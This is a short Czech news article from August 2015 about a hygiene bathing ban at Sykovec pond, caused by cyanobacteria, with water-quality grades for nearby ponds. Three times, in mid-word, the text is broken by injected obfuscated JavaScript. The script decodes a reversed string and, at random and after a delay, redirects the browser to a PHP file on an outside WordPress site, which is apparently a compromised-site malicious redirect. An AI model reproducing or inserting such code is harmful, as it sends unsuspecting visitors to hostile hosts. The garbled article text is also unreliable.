Rainbow page separator

V Sykovci byl vyhlášen zákaz koupání

Úterý, 18. srpna 2015

Tři Studně / Dočasný zákaz koupání byl hygieniky vyhlášen v rybníku Sykovec u Třech Studní. Důvodem je nadměrné množství sinic a chlorofylu ve vodě, což pro koupající se lidi představuje značné zdravotní riziko. Nejčastějšími onemocněními, které sinice způsobují, jsou střevní a žaludeční potíže, záněty uší a očí. Dočasný zákaz užívání vody ke koupání platí až do doby prokázání vyhovujících labora[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}torních rozborů.
Nikoliv přímo zákaz, ale voda nevhodná ke koupání, což je v pětistupňové hodnotící řadě čtyřka, je ze sledovaných nádrží ve žďárském okrese aktuálně také v Medlovském rybníku.
Mírně zhoršenou jakostí vody, tedy trojkou, nyní disponují rybníky Domanínský, Velké Dářko a Pilská nádrž. Po koupeli v nich se u citlivých jedinců mohou objevit zdravotní potíže, hygienici pro[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to doporučují, aby se lidé co nejdříve osprchovali čis[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tou vodou.